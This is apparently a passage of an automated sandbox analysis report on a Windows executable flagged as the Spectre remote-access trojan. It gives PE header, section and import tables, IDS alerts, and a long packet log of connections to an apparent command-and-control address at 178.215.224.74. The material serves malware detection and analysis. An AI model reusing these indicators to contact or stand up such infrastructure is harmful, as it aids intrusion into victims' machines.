                                      mov dword ptr [esp+1Ch], esi
                                      jmp 00007F7274F8C783h
                                      push 00000020h
                                      pop ebx
                                      cmp ax, bx
                                      jne 00007F7274F8C6FAh
                                      add esi, 02h
                                      cmp word ptr [esi], bx
                                      Programming Language:
                                      • [ C ] VS2008 SP1 build 30729
                                      • [IMP] VS2008 SP1 build 30729
                                      • [ C ] VS2010 SP1 build 40219
                                      • [RES] VS2010 SP1 build 40219
                                      • [LNK] VS2010 SP1 build 40219
                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xac400xb4.rdata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x1000000x236ee.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x12d79f0x2860
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000x994.ndata
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x90000x2d0.rdata
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x10000x728c0x7400419d4e1be1ac35a5db9c47f553b27ceaFalse0.6566540948275862data6.499708590628113IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rdata0x90000x2b6e0x2c00cca1ca3fbf99570f6de9b43ce767f368False0.3678977272727273data4.497932535153822IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .data0xc0000x72b9c0x20077f0839f8ebea31040e462523e1c770eFalse0.279296875data1.8049406284608531IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .ndata0x7f0000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .rsrc0x1000000x236ee0x23800d4b7777c39e0cdfd8fc2eb8610c0025aFalse0.9409317231514085data7.730108626388941IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc0x1240000xfd60x1000e8112a529f31e46f81db1a2c203d09c7False0.597900390625data5.582671519403722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      RT_ICON0x1002500x174c0PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.983148893360161
                                      RT_ICON0x1177100x7e45PNG image data, 128 x 128, 8-bit/color RGBA, non-interlacedEnglishUnited States1.000340293890178
                                      RT_ICON0x11f5580x2668Device independent bitmap graphic, 48 x 96 x 32, image size 9792EnglishUnited States0.5926566314076485
                                      RT_ICON0x121bc00x1128Device independent bitmap graphic, 32 x 64 x 32, image size 4352EnglishUnited States0.6434426229508197
                                      RT_ICON0x122ce80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.7526595744680851
                                      RT_DIALOG0x1231500x100dataEnglishUnited States0.5234375
                                      RT_DIALOG0x1232500x11cdataEnglishUnited States0.6056338028169014
                                      RT_DIALOG0x12336c0x60dataEnglishUnited States0.7291666666666666
                                      RT_GROUP_ICON0x1233cc0x4cTarga image data - Map 32 x 29888 x 1 +1EnglishUnited States0.8026315789473685
                                      RT_MANIFEST0x1234180x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193
                                      DLLImport
                                      KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                      USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                      GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                      SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                      ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                      COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                      ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                      VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                                      Language of compilation systemCountry where language is spokenMap
                                      EnglishUnited States
                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                      2024-11-24T12:05:21.959147+01002853767ETPRO MALWARE Win32/Spectre RAT CnC Activity M11192.168.2.549864178.215.224.7480TCP
                                      2024-11-24T12:05:21.959147+01002853768ETPRO MALWARE Win32/SpectreRAT CnC Activity M21192.168.2.549864178.215.224.7480TCP
                                      TimestampSource PortDest PortSource IPDest IP
                                      Nov 24, 2024 12:04:25.177210093 CET4973280192.168.2.5178.215.224.252
                                      Nov 24, 2024 12:04:25.296983957 CET8049732178.215.224.252192.168.2.5
                                      Nov 24, 2024 12:04:25.297072887 CET4973280192.168.2.5178.215.224.252
                                      Nov 24, 2024 12:04:25.297477961 CET4973280192.168.2.5178.215.224.252
                                      Nov 24, 2024 12:04:25.417644024 CET8049732178.215.224.252192.168.2.5
                                      Nov 24, 2024 12:04:47.228230953 CET8049732178.215.224.252192.168.2.5
                                      Nov 24, 2024 12:04:47.228383064 CET4973280192.168.2.5178.215.224.252
                                      Nov 24, 2024 12:04:47.269731998 CET4973280192.168.2.5178.215.224.252
                                      Nov 24, 2024 12:04:47.389327049 CET8049732178.215.224.252192.168.2.5
                                      Nov 24, 2024 12:04:53.120485067 CET4979380192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:04:53.240432024 CET8049793178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:04:53.240603924 CET4979380192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:04:53.240776062 CET4979380192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:04:53.360373020 CET8049793178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:04:54.608581066 CET8049793178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:04:54.617719889 CET4979380192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:04:54.738193035 CET8049793178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:04:54.738291979 CET4979380192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:04:54.912442923 CET4979880192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:04:55.032366991 CET8049798178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:04:55.032502890 CET4979880192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:04:55.032725096 CET4979880192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:04:55.154823065 CET8049798178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:04:56.343988895 CET8049798178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:04:56.345562935 CET4979880192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:04:56.465677023 CET8049798178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:04:56.465764999 CET4979880192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:04:56.498632908 CET4980080192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:04:56.618340969 CET8049800178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:04:56.618442059 CET4980080192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:04:56.618705034 CET4980080192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:04:56.742481947 CET8049800178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:04:57.936877966 CET8049800178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:04:57.949026108 CET4980080192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:04:58.069073915 CET8049800178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:04:58.072737932 CET4980080192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:04:58.154668093 CET4980680192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:04:58.274377108 CET8049806178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:04:58.276763916 CET4980680192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:04:58.276925087 CET4980680192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:04:58.398413897 CET8049806178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:04:59.633570910 CET8049806178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:04:59.641096115 CET4980680192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:04:59.761104107 CET8049806178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:04:59.761241913 CET4980680192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:04:59.841402054 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:04:59.964603901 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:04:59.964795113 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:04:59.965029001 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:00.084825039 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.264620066 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.264697075 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.264734983 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.264767885 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.264801025 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.264834881 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.264869928 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.264869928 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.264869928 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.264894962 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.264904022 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.264938116 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.264951944 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.264972925 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.265029907 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.385499001 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.385834932 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.385909081 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.456671953 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.456886053 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.456939936 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.460817099 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.460932970 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.460983038 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.469249964 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.469460964 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.469504118 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.477720022 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.477889061 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.477943897 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.486169100 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.486344099 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.486404896 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.494504929 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.494641066 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.494693995 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.502966881 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.503129005 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.503186941 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.511358976 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.512106895 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.512166977 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.519845009 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.520410061 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.520478964 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.528156042 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.528584957 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.528642893 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.536567926 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.536900043 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.536959887 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.648900032 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.649024010 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.649338007 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.651215076 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.651890039 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.651957035 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.657413960 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.657726049 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.657793045 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.662410975 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.662611008 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.662674904 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.668283939 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.668507099 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.668561935 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.673021078 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.674240112 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.674331903 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.677573919 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.677731991 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.677783012 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.681433916 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.682310104 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.682364941 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.686384916 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.686672926 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.686728954 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.691787958 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.692008018 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.692065954 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.696532965 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.697025061 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.697082996 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.700114965 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.700234890 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.700293064 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.704879999 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.705178976 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.705233097 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.710316896 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.711365938 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.711424112 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.715593100 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.715879917 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.715931892 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.720065117 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.720298052 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.720352888 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.724848032 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.724998951 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.725049973 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.729298115 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.729537964 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.729588985 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.735193968 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.735399008 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.735446930 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.739104033 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.739375114 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.739435911 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.743685961 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.794939995 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.842932940 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.843091965 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.843275070 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.844876051 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.845016956 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.845076084 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.848016024 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.848323107 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.848381996 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.852147102 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.852273941 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.852330923 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.856014013 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.856386900 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.856446981 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.860068083 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.860232115 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.860286951 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.863697052 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.863955975 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.864012957 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.867419004 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.867640018 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.867695093 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.870826006 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.871059895 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.871114969 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.874378920 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.874511003 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.874567032 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.877926111 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.878034115 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.878088951 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.881515980 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.881624937 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.881676912 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.885169983 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.885237932 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.885288954 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.888550997 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.888689995 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.888741016 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.892210007 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.892441034 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.892508984 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.895807028 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.895860910 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.895910978 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.899307013 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.899393082 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.899444103 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.902766943 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.902817965 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.902863979 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.906425953 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.906603098 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.906656981 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.909954071 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.910062075 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.910115004 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.913414001 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.913516998 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.913566113 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.917051077 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.917145967 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.917197943 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.920459032 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.920514107 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.920561075 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.923979044 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.924134016 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.924186945 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.927572966 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.927680016 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.927732944 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.931217909 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.931371927 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.931425095 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.934700966 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.934813976 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.934861898 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.938189030 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.938380957 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.938436985 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.941765070 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.941893101 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.941947937 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.945199966 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.945346117 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.945398092 CET4981280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:01.948797941 CET8049812178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:01.948916912 CET8049812178.215.224.74192.168.2.5
